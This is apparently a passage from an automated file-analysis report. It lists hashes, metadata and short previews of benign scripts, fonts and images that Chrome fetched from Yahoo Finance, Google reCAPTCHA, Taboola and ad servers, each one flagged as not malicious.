                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (829), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):829
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.425873936320868
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:4HkskouMq5/Jz2pRNrBZJuvu8goqc0ioNhc+w4+mI:2kNz2bNrVENtmN+A+j
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7E21DABBD1F4B0A7D82DE67B2256FA43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0C0071540732504840E9DCE48407DC4C61436B96
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:81C8F9F3C87DDB07381322CDD9D35FAAD04C8F277C060D9319D4CA25C7637DDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D3D44C6C18F84DB5917C8ADD6359B5F1A81B4EE2807222E8838ECC2F4AFAFA6E221F4FC2D017DFE010FE1826BBA2B96FDD76C02F4B3864D86BCE0BEA74C5B4E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/recaptcha/api2/aframe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE HTML><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body><script nonce="DkE45R9TKc8BWckYjONmWw">/** Anti-fraud and anti-abuse applications only. See google.com/recaptcha */ try{var clients={'sodar':'https://pagead2.googlesyndication.com/pagead/sodar?'};window.addEventListener("message",function(a){try{if(a.source===window.parent){var b=JSON.parse(a.data);var c=clients[b['id']];if(c){var d=document.createElement('img');d.src=c+b['params']+'&rc='+(localStorage.getItem("rc::a")?sessionStorage.getItem("rc::b"):"");window.document.body.appendChild(d);sessionStorage.setItem("rc::e",parseInt(sessionStorage.getItem("rc::e")||0)+1);localStorage.setItem("rc::h",'1727716945286');}}}catch(b){}});window.parent.postMessage("_grecaptcha_ready", "*");}catch(b){}</script></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1911)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.265795322246812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:qjvyQ3tjzY1boftAZbq0ejRi4iVRSr4c1fQv44zg9:qjvntjzY96UbREW7FRv44za
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DEA4B1E928B3DE42020FCE62C1F5D8F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7DFBBF555418C47401B8DF86235DA52C358C7EEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A98BBBC743525D160FB7638E1ED20C0B4B9FB833349FF8F466D7A418AF140946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:48CF5D603C9DDA3E8191E240ACB223498A8AAFCB46809AEE81A791B0C594E972DA1FB7651D931B1EF53568BFF839B35C8621B301E2D7291860418B258CC1665A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadSparkline.C8zWaz2x.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as P,c as b,h as A,J as w,K as E}from"./commonUtil.BWwawKjd.js";import{f as k,l as g}from"./logUtil.CCV3qKPL.js";async function C(n,o){var l;const{type:i="performance",pfId:f,silent:p=!1,range:m="1d",interval:h="2m",symbol:u}=o,[a,[s]]=await Promise.all([P(n),b(["portfolio"],n)]);if(!A(a)||!((l=a.user)!=null&&l.guid)||i==="quotePerformance"&&!u)return;const t={end:"2",start:"1"};f&&i==="performance"?t.pfId=f:i==="quotePerformance"&&(t.symbol=u),typeof o.start=="number"&&typeof o.end=="number"?(t.start=o.start.toString(),t.end=o.end.toString()):(t.interval=h,t.range=m);try{const r=await k(n,{crumb:!0,pathname:`/ws/portfolio-timeseries-api/v2/portfolio/${i}/chart`,perfLabel:"getPerformanceChart",query:t,timeout:5e3});if(!p){const d=w(r==null?void 0:r.chart);s.updatePerformanceChart({chart:d,pfId:f})}return r}catch(r){throw g(n,o,{data:r,perfLabel:"getPerformanceChart"}),p||s.setError(E),r}}async function q(n,o){var d;const{interval:i="5m",indicators:f="close",includeTimestamps:p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2145)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2173
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2369641537402165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:ezJHaFBhh6ZcB1deYarBhh6OlRwQh6I9RlrN0fv5lhDRaDWurj76y5HnlAbrHnV:ezJyPGs1delPbXR6FDRaDWAj76ytnli
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BA1111D37A99BD6CC5055729DEA3C021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:04F8C51D77BFFE87E58CFDFECD74B3066E2ED9BE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F3D1DADE0DC4DB1241CEC26DEB64CC2BBCD65CA02139E194A74D759F7AD1C138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:3AB2E4B0E281F40675032A94F12DD6D6C840253FE1A11049BDCA007D4B16B398D2A777B2338C557317768F3B5D5BAAF4137960194FF51CA9471D5BE2673B9812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! 20240929-12-RELEASE */..(o=>{const e="top",t="https://cdn.taboola.com",i="http://localhost:9876",n=`${t}/libtrc/static/topics/taboola-browsing-topics.html`,r=`tbl-browsing-topics-iframe-${100*Math.random()}`;function s(){try{if(!TRC.topics)return;c(TRC.topics)}catch(o){__trcWarn(`failed to save handed Google Topics at local storage: ${o.message}`)}}function c(o){try{const t=a()||[];for(let e=0;e<o.length;e++){const i=o[e],n=t.some(o=>o.topic===i.topic);if(!n){const o={topic:i.topic,taxonomy:i.taxonomyVersion,model:i.modelVersion,config:i.configVersion,version:i.version};t.push(o)}}if(!t.length)return;TRC.pageManager.storeValue(e,JSON.stringify(t)),m()}catch(o){__trcWarn(`failed to save Google Topics at local storage: ${o.message}`)}}function a(){let o,t;try{if((t=(o=TRC.pageManager.getValue(e))?JSON.parse(o):null)&&t.length>0){const o=l(t);return o}}catch(o){__trcWarn(`failed to read Google Topics from local storage: ${o.message}`)}}function l(o){let t=!1;return o.forEach((e,i)=>{(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1944)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1945
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.277146874475536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:ecIZsWoMkq3/6hrrcvgHVlrds9dPS0hVQI9OiQ7rFPw8obr2pVhTQoheC7+7mN9g:ecyFoMkqSWv4Vl63aRCrtd7mz1py7Yna
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F7C90FC743C29B46D878C983F667DC13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:47948BE8922205A4567C79ECA35BE5FEEB39742F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B77E4C5B0C00A04A8A0B126C859F18A2D862609B38761246EF5268CDADAB9F40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E28A5FFE4C4F9456CE71B5D21F1DD568F6951BEA55D492E4C4F68BEAD6B5D02F89E8AC0F81A071FAAA87B4A81CF6EA8421DA31BDD1AF62E54B405D10DE52E1D0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/LazyRender.DVogf9MW.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as k,c as E,b as v,j as w,k as _,u as I,g as q,a as z,i as r,I as L,p as m,e as N,d as S,f as j,q as D,F,G,n as M,v as R}from"./scheduler.Dsuh-FKt.js";import{S as V,i as A,t as B,a as H}from"./index.CvwOawEI.js";import{i as J}from"./intersectUtil.DVqOQxux.js";const K=n=>({loading:n&2,Component:n&4,hasError:n&8}),d=n=>({loading:n[1],Component:n[2],hasError:n[3]});function p(n){let i,e=n[0]==="visibility"&&g(n);return{c(){e&&e.c(),i=m()},l(t){e&&e.l(t),i=m()},m(t,o){e&&e.m(t,o),_(t,i,o)},p(t,o){t[0]==="visibility"?e?e.p(t,o):(e=g(t),e.c(),e.m(i.parentNode,i)):e&&(e.d(1),e=null)},d(t){t&&r(i),e&&e.d(t)}}}function g(n){let i,e,t;return{c(){i=N("div"),this.h()},l(o){i=S(o,"DIV",{"data-testid":!0}),j(i).forEach(r),this.h()},h(){D(i,"data-testid","lazy-render")},m(o,l){_(o,i,l),e||(t=[F(J.call(null,i,{preset:"beforeview"})),G(i,"intersect",n[4])],e=!0)},p:M,d(o){o&&r(i),e=!1,R(t)}}}function O(n){let i,e,t=n[1]&&p(n);const o=n[7].default,l=E(o,n,n[6],d);return{c(){t&&t.c(),i=v(),l&&l.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4365), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.145735525465993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3hNzEpwq1krLq1Jr/9Ipefr4qN1lnA7O39IptQbmGMakwQy+p:3zEwuuLul/2pefN1lAC32Aa/akty+p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9D2A8EFBE3FE9705E54DF41100EA2DAE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9CA39F309735BE4BDA4D6CE2D01C5F0857BD8E67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F59452BBA989E5A78E9492AE296CBF910745529C3294B49A58EFA4EC7EBA8D45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5D460C83F9DD30038422F843C68D1BE812E3006395355122BBA8E8608822B9751D2800FE024C85276FA36130D787364CF6CFAF333F9C0D3CC6FC2E3DEC796775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-clipboard-copy-1.0.2-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-clipboard-copy"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(o[r])return o[r].exports;var n=o[r]={i:r,l:!1,exports:{}};return e[r].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var o={};return t.m=e,t.c=o,t.d=function(e,o,r){t.o(e,o)||Object.defineProperty(e,o,{configurable:!1,enumerable:!0,get:r})},t.n=function(e){var o=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(o,"a",o),o},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,o){"use strict";function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a cl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), CFF, length 53884, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53884
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995878551757057
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:gAJTrGlcp1/H4IgF0acoTGf14UjRF8w28zIbBxO1aByt:/FrJZgVcpfWUjs0J1z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FF00245B9F2E06CD24C5FD72CBD46204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:25ADB26BDAD0E01CEEC34BE5B0C4E941ED86461D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CBB992FD0D0464F5ADED0D126E2BE003F2131FC63266E47C34656616C2CDC2E0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:DEF265ABE0DBF2EE2C962CDFE9AA30540622CECE05917C8AE8840DE24F86CBFE1F460026C258B788135973E222FFB09FE061E380C9E211FE40A97F10EBCAAA7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/cv/apiv2/finance/fonts/GT-America-Standard-Regular.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:wOF2OTTO...|...........+...........................D..$...*....`..j.6.$.......G. [0...Ucl.,..G4?...@.....M.0T..&..f..h...+.w+....|......H6b....^.U--.j.....A..iQ..#...#b.1!..K..,:.eN".k...~...f.8)....Ub..RF........=.}/...gx.....]""......./NM95...t..m;..Y..F>..[D'9..... B..y...`.L.....HnHK..l..V...._V...7!..w..wG.......HH....5"j...V.^`K.oI..{..>.c.."D..@....W|..R;.b.z..`............)D.!...r...1..l9....7..\...4..2...+..'5T.(..;q.6.dl.{.^.O..(.l..{.c.TFHe$...z.S_f<..k...e+..-7..V..aE...a../f.x1.&D.............#j;.'..<..s....R.Z.a.....L.....E.l..,.bq.f....v.d.*`..9.c.FD.....P..B..7^_.#..}_..,.|.oe(........m...P...0+e]...B.......>f.J..L..D.D"%@..B.(Q.......>.M.Y.?k..O..D.e...!.{.im<].8..P`S...$.V]B....B....#...$T.z.L....$..I):.i.Z6.}r.89.................~.EOn....Y.u..............c...../.-..F.4.f.i.!!...j..MI..K.....S\.d[.U..,c.n@..,..".....hd.a...Z.Kk._...'....;.......#I,\...1...S.\....E..E.;].&+f.ET0[XG.$A.. @.@..W.i8/o..................."^=.2..%...z
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.115380967449577
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:qCIsqDmJS4RKb5ykKcvXjXRHoNcHn6KFAdSHF/F3Ywn:qT9mc4sl3O4n44V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0C10F0464F42663F554C90A9AD440DC5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FFDEDE5CEA1423B9888D3C0CE22DAE8376212E94
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7E8C739C142D8934EA6C14482828E9D6C02C79CC3550D89D1381614216E1E6B5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9E5223C932ABBE382F5F8752E7C0AD7A4230F4DA0DB67F19625C3E092CCD26C752F514798AAAE82400CA9D8E2DBC2A25449A150F29B54085F0F43260A1A846BA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const o='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 13H5v-2h14z"/></svg>';export{o as R};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=537072960&val=19oynko26iyow
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):151484
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.465121028425332
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:+5B312xIDDuzOQJvMTqByskP4LpJsIPfRn5v9:yB312x9zO9e4vQlJ3hn5v9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:554E57FA994CD5F2E374F254C9CD0F9A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC680739320F5E65A0F44B357DFCA940E1CABF1C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:88AB59EE34B4504FE89CCF43B3C1FD5D8ED73605F9ECF763D6C10C3A7636E8DA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A7B4DEA8465AAC7E4F747CB82BCE271C52E99B46122BF5E2DBB96BEA52554B668F335919115FC326C0A127966CF792BDA5E9F776C997D62B705951BED996163A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:var zn=Object.defineProperty;var qn=(n,t,e)=>t in n?zn(n,t,{enumerable:!0,configurable:!0,writable:!0,value:e}):n[t]=e;var d=(n,t,e)=>(qn(n,typeof t!="symbol"?t+"":t,e),e),Xn=(n,t,e)=>{if(!t.has(n))throw TypeError("Cannot "+e)};var fe=(n,t,e)=>{if(t.has(n))throw TypeError("Cannot add the same private member more than once");t instanceof WeakSet?t.add(n):t.set(n,e)};var w=(n,t,e)=>(Xn(n,t,"access private method"),e);import{E as Tt}from"./scheduler.Dsuh-FKt.js";import{g as yt}from"./stores.BCwnb1-k.js";import{c as Jn,w as Er}from"./43.BgWy8GOF.js";const _r=(()=>{try{return window.localStorage.setItem("test","test"),window.localStorage.removeItem("test"),!0}catch{return!1}})(),Qn=(n,t)=>{if(!n||!t)return!1;const e=/^\/($|community)/;return e.test(n)&&e.test(t)},bt={DESKTOP:"desktop",TABLET:"tablet",SMARTPHONE:"smartphone"};class Tr{constructor(t){d(this,"innerState");d(this,"innerStore");this.innerState=this.getInitialState(),this.innerStore=t(this.innerState,this.startStopNotifier),this.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with very long lines (15752)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15753
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.489799632131915
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:63ZObhsBV95gsZ+eGi1HgSXZmeke2ZMY0rnt58xPr:+ObaT95/+e9H9Jmle2ZMY0nt58xz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7364073E3C30C116E8EB5B04709AECFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EC52F3861CDCD208B70B6E90F2BADDC333CE9384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BE33EDF61ACD72CA8491BE3DBD63213D0AA5D41F43D9093D688C83573375EF0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1B48A2AD53BCA9C6CB27516519C64F3525696F64BC7CFC097891A60D048FF53FC85ACDCC720518D33E9B218CB13AF231BCE3B4CF435D7CF7446950E86063F5F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as ie,e as z,d as I,f as A,i as S,q as w,K as T,k as q,n as L,Z as ce,y as pe,A as Y,T as G,p as B,U as R,V as D,l as x,x as fe,o as be,Q as _e,O as U}from"./scheduler.Dsuh-FKt.js";import{S as he,i as ue,g as ye,a as F,e as we,t as J,c as ke,b as ve,m as Pe,d as Se}from"./index.CvwOawEI.js";import{e as W}from"./each.CI2tb2RB.js";import{g as H}from"./spread.CgU5AtxT.js";import{f as K,t as Ce,j as Q}from"./sortable.esm.CIj-TXsI.js";import{g as de,e as Ee}from"./commonUtil.BWwawKjd.js";import{l as Ae}from"./loadSparkline.C8zWaz2x.js";function Oe(o,t,e){return(t=function(n){var r=function(s,l){if(typeof s!="object"||!s)return s;var c=s[Symbol.toPrimitive];if(c!==void 0){var h=c.call(s,l||"default");if(typeof h!="object")return h;throw new TypeError("@@toPrimitive must return a primitive value.")}return(l==="string"?String:Number)(s)}(n,"string");return typeof r=="symbol"?r:r+""}(t))in o?Object.defineProperty(o,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):o[t]=e,o}functio
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8712)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11489
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.615631486628828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:OS+JjCphviIfEVq99u/8FCL0XnxeLyu4VGEcCFDZ5gBRsqn7N5K9sH/2LQg6m5tf:OS+JjshviIf43L0XnxKyu4VzdtDcxn7g
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:739061425CD28831814151CB229EE421
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:542A5BA54077F1073D1B9133AD05BF3637C8D9FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C745245EB433550C53DDCA4A475FF3264A65C66E0A315640208F9EA7D2D42F9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:45B9725A8A4D0D507695DC4819811E165C1822ADA9FA4D083EF4BB73F2FE72E5895385C5C9E1E7DA3E58677D813D5595992A646F1E2402E920365A31815E649B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{F as h}from"./commonUtil.BWwawKjd.js";const S=`<svg xmlns="http://www.w3.org/2000/svg" viewBox="5 0 20 24" width="1rem" height="1rem">. <path fill-rule="evenodd" d="M17 8V6c0-2.76-2.24-5-5-5S7 3.24 7 6v4h.2c-1.12 0-1.68 0-2.108.218a2 2 0 0 0-.874.874C4 11.52 4 12.08 4 13.2v5.6c0 1.12 0 1.68.218 2.108a2 2 0 0 0 .874.874C5.52 22 6.08 22 7.2 22h9.6c1.12 0 1.68 0 2.108-.218a2 2 0 0 0 .874-.874C20 20.48 20 19.92 20 18.8v-5.6c0-1.12 0-1.68-.218-2.108a2 2 0 0 0-.874-.874C18.48 10 17.92 10 16.8 10h.2zm-1.9 2H8.9V6c0-1.71 1.39-3.1 3.1-3.1s3.1 1.39 3.1 3.1z" clip-rule="evenodd"></path>.</svg>`,A="https://checkout.finance.yahoo.com",w={"community-insights":"https://s.yimg.com/cv/apiv2/default/finance/subscriptions/communityInsightsUpsell.png","fair-value":"https://s.yimg.com/cv/apiv2/finance/subscription/fair-value-source.png","insider-sentiment":"https://s.yimg.com/cv/apiv2/finance/subscription/insider-sentiment-source.png",dividends:"https://s.yimg.com/cv/apiv2/finance/subscription/di
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 260 x 340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):539840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.950660003114956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
